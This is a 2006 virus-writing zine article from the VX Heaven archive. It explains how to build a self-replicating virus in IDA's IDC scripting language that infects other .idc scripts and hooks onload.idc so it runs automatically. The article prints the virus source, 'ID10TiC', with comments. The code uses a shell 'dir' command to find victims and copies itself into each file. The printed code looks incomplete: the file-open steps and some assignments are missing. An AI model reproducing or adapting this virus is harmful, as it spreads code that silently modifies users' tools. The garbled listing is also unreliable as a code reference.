VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

The IDA Scripting Language

roy g biv
Ready Rangers Liberation Front [7]
July 2006

[Back to index] [Comments]

What is it?

Many people know about the Interactive Disassembler. It is a great tool for disassembling many different file formats for many different CPUs. It even has a debugger now, so it can be used for all kinds of reverse-engineering, unpacking, decrypting, etc. In case that was not enough functionality, it also supports a language called IDC. In the words of Ilfak, IDC language is a C-like language. It has the same lexical tokens as C does: character set, constants, identifiers, keywords, etc. A program in IDC consists of function declarations.

IDC language

For some years, I wondered if an IDA virus could be possible. When I first tried in the IDC language, I wanted to infect Windows files. There were some problems, though. The first problem is that IDA opens a file with full sharing, but the IDC language does not support doing that, so it is not possible to infect the file that is being examined. That leaves as an option to find other files to infect, but there is no enumeration function in the IDC language. I thought that meant that we can infect only the files that we know to exist, and that wasn't interesting to me. However, I just needed to ask the command interpreter to find the files for me. The remaining problem, of course, is that there is no access to the Windows APIs, so there is no way to check for protected file. To avoid that, I just decided to infect other IDC files instead.

IDC programs

Most IDC programs are designed to execute immediately. To do that, they must contain a function called "main". This function is executed whenever the IDC file is loaded.

The exception to that rule is the special file called "onload.idc". It functions like the global template in Microsoft Office. The "OnLoad" function is called automatically by IDA when a new file is loaded for analysis. There is another file of similar type, called "userload.idc". It is loaded by the onload.idc, and the "userload" function is called automatically in that case. By placing code into either of these two functions, we can be called whenever IDA starts.

IDC variables

The IDC language supports variables of automatic type (similar to Variants in OLE2). That means we can assign any letters or numbers or strings to any variable in one line, and in the next line we can assign anything else. No need to declare the variable to be of a particular type.

Variables have a scope (a variable declared inside {} are not visible outside) but there are no global variables.

Just like in C, variable declaration must be the first thing in a function.

The code

To make a replicating text code, we can either carry our own source, or read it from an already infected file. If our source contains special characters (like '"' and '\' in IDC), they must be escaped in order to place them into a string variable. The problem is that after the assignment, they need to be escaped again when writing to another file. This is the puzzle - how to carry both transportable and executable source? Instead of solving that, I just find an infected file and read the source from there. :)

Here is the code, must be a single line:

/*ID10TiC - roy g biv 06/07/06*/
        auto a,b,c,d,e,f,g,h,i,j;
        Exec("%comspec% /c dir /b "+(a=GetIdaDirectory()+"\\idc\\")+"*.idc>r");
                                                                        //make list of IDC files
        while(d>=0)                                                  //becomes -1 when all list read
                while(!c&&(d=readstr(b))>0)                          //get filename
                                                                        //open potential victim
                        while((d=readstr(e))>0)                      //read each line
                                if(strstr(d,"auto")>0)               //look for "auto" line
                                        if((f=strstr(d,"/*ID"))>0)   //check for infection marker
                                                if(!g)                                                                                                            //if not read source yet
                                                        c=1;                                                                                                              //set restart flag
                                                        g=1;                                                                                                              //remember read source
                                                                        //get our source
                                                break;                  //restart
                                        if(g)                           //if read source
                                                                        //seek after ';'
                                                while((j=readstr(e))>0)//read rest of file
                                                fseek(e,i,0);           //seek after ';'
                                                writestr(e,h+f);        //write our source then rest of file
        /**/                                                            //end of code marker with next '}'

Greets to friendly people (A-Z)

Active - Benny - Obleak - Prototype - Ratter - Ronin - RT Fishel - sars - SPTH - The Gingerbread Man - Ultras - uNdErX - Vallez - Vecna - VirusBuster - Whitehead

rgb/defjam jul 2006
[email protected]
By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! aka